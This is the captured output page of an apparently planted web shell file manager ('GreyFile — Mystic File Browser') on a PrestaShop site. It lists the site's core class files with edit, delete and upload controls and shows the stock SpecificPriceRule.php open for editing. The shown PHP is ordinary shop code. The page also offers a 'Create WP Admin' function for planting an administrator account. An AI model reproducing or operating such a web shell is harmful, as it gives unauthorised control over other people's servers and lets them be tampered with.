?? GreyFile — Mystic File Browser
Current path:
home
/
webdevt
/
www
/
schtroumpf.fr
/
classes
/
?? Create WP Admin
??
Go up: /home/webdevt/www/schtroumpf.fr
?? Editing: SpecificPriceRule.php
<?php /** * Copyright since 2007 PrestaShop SA and Contributors * PrestaShop is an International Registered Trademark & Property of PrestaShop SA * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.md. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/OSL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to https://devdocs.prestashop.com/ for more information. * * @author PrestaShop SA and Contributors <contact@prestashop.com> * @copyright Since 2007 PrestaShop SA and Contributors * @license https://opensource.org/licenses/OSL-3.0 Open Software License (OSL 3.0) */ class SpecificPriceRuleCore extends ObjectModel { public $name; public $id_shop; public $id_currency; public $id_country; public $id_group; public $from_quantity; public $price; public $reduction; public $reduction_tax; public $reduction_type; public $from; public $to; protected static $rules_application_enable = true; /** * @see ObjectModel::$definition */ public static $definition = [ 'table' => 'specific_price_rule', 'primary' => 'id_specific_price_rule', 'fields' => [ 'name' => ['type' => self::TYPE_STRING, 'validate' => 'isCleanHtml', 'required' => true], 'id_shop' => ['type' => self::TYPE_INT, 'validate' => 'isUnsignedId', 'required' => true], 'id_country' => ['type' => self::TYPE_INT, 'validate' => 'isUnsignedId', 'required' => true], 'id_currency' => ['type' => self::TYPE_INT, 'validate' => 'isUnsignedId', 'required' => true], 'id_group' => ['type' => self::TYPE_INT, 'validate' => 'isUnsignedId', 'required' => true], 'from_quantity' => ['type' => self::TYPE_INT, 'validate' => 'isUnsignedInt', 'required' => true], 'price' => ['type' => self::TYPE_FLOAT, 'validate' => 'isNegativePrice', 'required' => true], 'reduction' => ['type' => self::TYPE_FLOAT, 'validate' => 'isPrice', 'required' => true], 'reduction_tax' => ['type' => self::TYPE_INT, 'validate' => 'isBool', 'required' => true], 'reduction_type' => ['type' => self::TYPE_STRING, 'validate' => 'isReductionType', 'required' => true], 'from' => ['type' => self::TYPE_DATE, 'validate' => 'isDateFormat', 'required' => false], 'to' => ['type' => self::TYPE_DATE, 'validate' => 'isDateFormat', 'required' => false], ], ]; protected $webserviceParameters = [ 'objectsNodeName' => 'specific_price_rules', 'objectNodeName' => 'specific_price_rule', 'fields' => [ 'id_shop' => ['xlink_resource' => 'shops', 'required' => true], 'id_country' => ['xlink_resource' => 'countries', 'required' => true], 'id_currency' => ['xlink_resource' => 'currencies', 'required' => true], 'id_group' => ['xlink_resource' => 'groups', 'required' => true], ], ]; /** * @return bool * * @throws PrestaShopException */ public function delete() { $this->deleteConditions(); Db::getInstance()->execute('DELETE FROM ' . _DB_PREFIX_ . 'specific_price WHERE id_specific_price_rule=' . (int) $this->id); return (bool) parent::delete(); } public function deleteConditions() { $ids_condition_group = Db::getInstance()->executeS('SELECT id_specific_price_rule_condition_group FROM ' . _DB_PREFIX_ . 'specific_price_rule_condition_group WHERE id_specific_price_rule=' . (int) $this->id); if ($ids_condition_group) { foreach ($ids_condition_group as $row) { Db::getInstance()->delete('specific_price_rule_condition_group', 'id_specific_price_rule_condition_group=' . (int) $row['id_specific_price_rule_condition_group']); Db::getInstance()->delete('specific_price_rule_condition', 'id_specific_price_rule_condition_group=' . (int) $row['id_specific_price_rule_condition_group']); } } } public static function disableAnyApplication() { SpecificPriceRule::$rules_application_enable = false; } public static function enableAnyApplication() { SpecificPriceRule::$rules_application_enable = true; } public function addConditions($conditions) { if (!is_array($conditions)) { return; } $result = Db::getInstance()->insert('specific_price_rule_condition_group', [ 'id_specific_price_rule' => (int) $this->id, ]); if (!$result) { return false; } $id_specific_price_rule_condition_group = (int) Db::getInstance()->Insert_ID(); foreach ($conditions as $condition) { $result = Db::getInstance()->insert('specific_price_rule_condition', [ 'id_specific_price_rule_condition_group' => (int) $id_specific_price_rule_condition_group, 'type' => pSQL($condition['type']), 'value' => (float) $condition['value'], ]); if (!$result) { return false; } } return true; } public function apply($products = false) { if (!SpecificPriceRule::$rules_application_enable) { return; } $this->resetApplication($products); $products = $this->getAffectedProducts($products); foreach ($products as $product) { SpecificPriceRule::applyRuleToProduct((int) $this->id, (int) $product['id_product'], (int) $product['id_product_attribute']); } } public function resetApplication($products = false) { $where = ''; if ($products && count($products)) { $where .= ' AND id_product IN (' . implode(', ', array_map('intval', $products)) . ')'; } return Db::getInstance()->execute('DELETE FROM ' . _DB_PREFIX_ . 'specific_price WHERE id_specific_price_rule=' . (int) $this->id . $where); } /** * @param array|bool $products */ public static function applyAllRules($products = false) { if (!SpecificPriceRule::$rules_application_enable) { return; } /** @var array<SpecificPriceRule> $rules */ $rules = new PrestaShopCollection('SpecificPriceRule'); foreach ($rules as $rule) { $rule->apply($products); } } public function getConditions() { $conditions = Db::getInstance()->executeS( ' SELECT g.*, c.* FROM ' . _DB_PREFIX_ . 'specific_price_rule_condition_group g LEFT JOIN ' . _DB_PREFIX_ . 'specific_price_rule_condition c ON (c.id_specific_price_rule_condition_group = g.id_specific_price_rule_condition_group) WHERE g.id_specific_price_rule=' . (int) $this->id ); $conditions_group = []; if ($conditions) { foreach ($conditions as &$condition) { if ($condition['type'] == 'attribute') { $condition['id_attribute_group'] = Db::getInstance()->getValue('SELECT id_attribute_group FROM ' . _DB_PREFIX_ . 'attribute WHERE id_attribute=' . (int) $condition['value']); } elseif ($condition['type'] == 'feature') { $condition['id_feature'] = Db::getInstance()->getValue('SELECT id_feature FROM ' . _DB_PREFIX_ . 'feature_value WHERE id_feature_value=' . (int) $condition['value']); } $conditions_group[(int) $condition['id_specific_price_rule_condition_group']][] = $condition; } } return $conditions_group; } /** * Return the product list affected by this specific rule. * * @param bool|array $products products list limitation * * @return array affected products list IDs * * @throws PrestaShopDatabaseException */ public function getAffectedProducts($products = false) { $conditions_group = $this->getConditions(); $shop_id = $this->id_shop ?: Context::getContext()->shop->id; $result = []; if ($conditions_group) { foreach ($conditions_group as $condition_group) { // Base request $query = new DbQuery(); $query->select('p.`id_product`') ->from('product', 'p') ->leftJoin('product_shop', 'ps', 'p.`id_product` = ps.`id_product`') ->where('ps.id_shop = ' . (int) $shop_id); $attributes_join_added = false; // Add the conditions foreach ($condition_group as $id_condition => $condition) { if ($condition['type'] == 'attribute') { if (!$attributes_join_added) { $query->select('pa.`id_product_attribute`') ->leftJoin('product_attribute', 'pa', 'p.`id_product` = pa.`id_product`') ->join(Shop::addSqlAssociation('product_attribute', 'pa', false)); $attributes_join_added = true; } $query->leftJoin('product_attribute_combination', 'pac' . (int) $id_condition, 'pa.`id_product_attribute` = pac' . (int) $id_condition . '.`id_product_attribute`') ->where('pac' . (int) $id_condition . '.`id_attribute` = ' . (int) $condition['value']); } elseif ($condition['type'] == 'manufacturer') { $query->where('p.id_manufacturer = ' . (int) $condition['value']); } elseif ($condition['type'] == 'category') { $query->leftJoin('category_product', 'cp' . (int) $id_condition, 'p.`id_product` = cp' . (int) $id_condition . '.`id_product`') ->where('cp' . (int) $id_condition . '.id_category = ' . (int) $condition['value']); } elseif ($condition['type'] == 'supplier') { $query->where('EXISTS( SELECT `ps' . (int) $id_condition . '`.`id_product` FROM `' . _DB_PREFIX_ . 'product_supplier` `ps' . (int) $id_condition . '` WHERE `p`.`id_product` = `ps' . (int) $id_condition . '`.`id_product` AND `ps' . (int) $id_condition . '`.`id_supplier` = ' . (int) $condition['value'] . ' )'); } elseif ($condition['type'] == 'feature') { $query->leftJoin('feature_product', 'fp' . (int) $id_condition, 'p.`id_product` = fp' . (int) $id_condition . '.`id_product`') ->where('fp' . (int) $id_condition . '.`id_feature_value` = ' . (int) $condition['value']); } } // Products limitation if ($products && count($products)) { $query->where('p.`id_product` IN (' . implode(', ', array_map('intval', $products)) . ')'); } // Force the column id_product_attribute if not requested if (!$attributes_join_added) { $query->select('NULL as `id_product_attribute`'); } // Merge previous result to current results $result = array_merge($result, Db::getInstance()->executeS($query)); } // Remove duplicate after the array_merge $result = array_unique($result, SORT_REGULAR); } else { // All products without conditions if ($products && count($products)) { if (!SpecificPrice::getByProductId(0, false, false, (int) $this->id)) { $query = new DbQuery(); $query->select('p.`id_product`') ->select('NULL as `id_product_attribute`') ->from('product', 'p') ->leftJoin('product_shop', 'ps', 'p.`id_product` = ps.`id_product`') ->where('ps.id_shop = ' . (int) $shop_id); $query->where('p.`id_product` IN (' . implode(', ', array_map('intval', $products)) . ')'); $result = Db::getInstance()->executeS($query); } } else { $result = [['id_product' => 0, 'id_product_attribute' => null]]; } } return $result; } public static function applyRuleToProduct($id_rule, $id_product, $id_product_attribute = null) { $rule = new SpecificPriceRule((int) $id_rule); if (!Validate::isLoadedObject($rule) || !Validate::isUnsignedInt($id_product)) { return false; } $specific_price = new SpecificPrice(); $specific_price->id_specific_price_rule = (int) $rule->id; $specific_price->id_product = (int) $id_product; $specific_price->id_product_attribute = (int) $id_product_attribute; $specific_price->id_customer = 0; $specific_price->id_shop = (int) $rule->id_shop; $specific_price->id_country = (int) $rule->id_country; $specific_price->id_currency = (int) $rule->id_currency; $specific_price->id_group = (int) $rule->id_group; $specific_price->from_quantity = (int) $rule->from_quantity; $specific_price->price = (float) $rule->price; $specific_price->reduction_type = $rule->reduction_type; $specific_price->reduction_tax = $rule->reduction_tax; $specific_price->reduction = ($rule->reduction_type == 'percentage' ? $rule->reduction / 100 : (float) $rule->reduction); $specific_price->from = $rule->from; $specific_price->to = $rule->to; return $specific_price->add(); } }
Save
Upload
??
Create Folder
??
Create File
??
assets
|
??? Delete
??
cache
|
??? Delete
??
checkout
|
??? Delete
??
container
|
??? Delete
??
controller
|
??? Delete
??
db
|
??? Delete
??
exception
|
??? Delete
??
form
|
??? Delete
??
helper
|
??? Delete
??
lang
|
??? Delete
??
log
|
??? Delete
??
module
|
??? Delete
??
order
|
??? Delete
??
pdf
|
??? Delete
??
product
|
??? Delete
??
proxy
|
??? Delete
??
range
|
??? Delete
??
shop
|
??? Delete
??
Smarty
|
??? Delete
??
stock
|
??? Delete
??
tax
|
??? Delete
??
tree
|
??? Delete
??
webservice
|
??? Delete
??
Access.php
|
?? Edit
|
??? Delete
??
Address.php
|
?? Edit
|
??? Delete
??
AddressChecksumCore.php
|
?? Edit
|
??? Delete
??
AddressFormat.php
|
?? Edit
|
??? Delete
??
Alias.php
|
?? Edit
|
??? Delete
??
Attachment.php
|
?? Edit
|
??? Delete
??
AttributeGroup.php
|
?? Edit
|
??? Delete
??
Carrier.php
|
?? Edit
|
??? Delete
??
Cart.php
|
?? Edit
|
??? Delete
??
CartRule.php
|
?? Edit
|
??? Delete
??
Category.php
|
?? Edit
|
??? Delete
??
Chart.php
|
?? Edit
|
??? Delete
??
ChecksumInterface.php
|
?? Edit
|
??? Delete
??
CMS.php
|
?? Edit
|
??? Delete
??
CMSCategory.php
|
?? Edit
|
??? Delete
??
CMSRole.php
|
?? Edit
|
??? Delete
??
Combination.php
|
?? Edit
|
??? Delete
??
Configuration.php
|
?? Edit
|
??? Delete
??
ConfigurationKPI.php
|
?? Edit
|
??? Delete
??
ConfigurationTest.php
|
?? Edit
|
??? Delete
??
Connection.php
|
?? Edit
|
??? Delete
??
ConnectionsSource.php
|
?? Edit
|
??? Delete
??
Contact.php
|
?? Edit
|
??? Delete
??
Context.php
|
?? Edit
|
??? Delete
??
Cookie.php
|
?? Edit
|
??? Delete
??
Country.php
|
?? Edit
|
??? Delete
??
CSV.php
|
?? Edit
|
??? Delete
??
Currency.php
|
?? Edit
|
??? Delete
??
Curve.php
|
?? Edit
|
??? Delete
??
Customer.php
|
?? Edit
|
??? Delete
??
CustomerAddress.php
|
?? Edit
|
??? Delete
??
CustomerMessage.php
|
?? Edit
|
??? Delete
??
CustomerSession.php
|
?? Edit
|
??? Delete
??
CustomerThread.php
|
?? Edit
|
??? Delete
??
Customization.php
|
?? Edit
|
??? Delete
??
CustomizationField.php
|
?? Edit
|
??? Delete
??
DateRange.php
|
?? Edit
|
??? Delete
??
Delivery.php
|
?? Edit
|
??? Delete
??
Dispatcher.php
|
?? Edit
|
??? Delete
??
Employee.php
|
?? Edit
|
??? Delete
??
EmployeeSession.php
|
?? Edit
|
??? Delete
??
Feature.php
|
?? Edit
|
??? Delete
??
FeatureFlag.php
|
?? Edit
|
??? Delete
??
FeatureValue.php
|
?? Edit
|
??? Delete
??
FileUploader.php
|
?? Edit
|
??? Delete
??
Gender.php
|
?? Edit
|
??? Delete
??
Group.php
|
?? Edit
|
??? Delete
??
GroupReduction.php
|
?? Edit
|
??? Delete
??
Guest.php
|
?? Edit
|
??? Delete
??
Hook.php
|
?? Edit
|
??? Delete
??
Image.php
|
?? Edit
|
??? Delete
??
ImageManager.php
|
?? Edit
|
??? Delete
??
ImageType.php
|
?? Edit
|
??? Delete
??
index.php
|
?? Edit
|
??? Delete
??
Language.php
|
?? Edit
|
??? Delete
??
Link.php
|
?? Edit
|
??? Delete
??
LocalizationPack.php
|
?? Edit
|
??? Delete
??
Mail.php
|
?? Edit
|
??? Delete
??
Manufacturer.php
|
?? Edit
|
??? Delete
??
ManufacturerAddress.php
|
?? Edit
|
??? Delete
??
Media.php
|
?? Edit
|
??? Delete
??
Message.php
|
?? Edit
|
??? Delete
??
Meta.php
|
?? Edit
|
??? Delete
??
Notification.php
|
?? Edit
|
??? Delete
??
ObjectModel.php
|
?? Edit
|
??? Delete
??
Pack.php
|
?? Edit
|
??? Delete
??
Page.php
|
?? Edit
|
??? Delete
??
PaymentFree.php
|
?? Edit
|
??? Delete
??
PaymentModule.php
|
?? Edit
|
??? Delete
??
PhpEncryption.php
|
?? Edit
|
??? Delete
??
PhpEncryptionEngine.php
|
?? Edit
|
??? Delete
??
PrestaShopAutoload.php
|
?? Edit
|
??? Delete
??
PrestaShopBackup.php
|
?? Edit
|
??? Delete
??
PrestaShopCollection.php
|
?? Edit
|
??? Delete
??
PrestaShopLogger.php
|
?? Edit
|
??? Delete
??
Product.php
|
?? Edit
|
??? Delete
??
ProductAssembler.php
|
?? Edit
|
??? Delete
??
ProductAttribute.php
|
?? Edit
|
??? Delete
??
ProductDownload.php
|
?? Edit
|
??? Delete
??
ProductPresenterFactory.php
|
?? Edit
|
??? Delete
??
ProductSale.php
|
?? Edit
|
??? Delete
??
ProductSupplier.php
|
?? Edit
|
??? Delete
??
Profile.php
|
?? Edit
|
??? Delete
??
QqUploadedFileForm.php
|
?? Edit
|
??? Delete
??
QqUploadedFileXhr.php
|
?? Edit
|
??? Delete
??
QuickAccess.php
|
?? Edit
|
??? Delete
??
RequestSql.php
|
?? Edit
|
??? Delete
??
Risk.php
|
?? Edit
|
??? Delete
??
Search.php
|
?? Edit
|
??? Delete
??
SearchEngine.php
|
?? Edit
|
??? Delete
??
SpecificPrice.php
|
?? Edit
|
??? Delete
??
SpecificPriceRule.php
|
?? Edit
|
??? Delete
??
State.php
|
?? Edit
|
??? Delete
??
Store.php
|
?? Edit
|
??? Delete
??
Supplier.php
|
?? Edit
|
??? Delete
??
SupplierAddress.php
|
?? Edit
|
??? Delete
??
Tab.php
|
?? Edit
|
??? Delete
??
Tag.php
|
?? Edit
|
??? Delete
??
Tools.php
|
?? Edit
|
??? Delete
??
Translate.php
|
?? Edit
|
??? Delete
??
TranslatedConfiguration.php
|
?? Edit
|
??? Delete
??
Upgrader.php
|
?? Edit
|
??? Delete
??
Uploader.php
|
?? Edit
|
??? Delete
??
Validate.php
|
?? Edit
|
??? Delete
??
ValidateConstraintTranslator.php
|
?? Edit
|
??? Delete
??
WarehouseAddress.php
|
?? Edit
|
??? Delete
??
Zone.php
|
?? Edit
|
??? Delete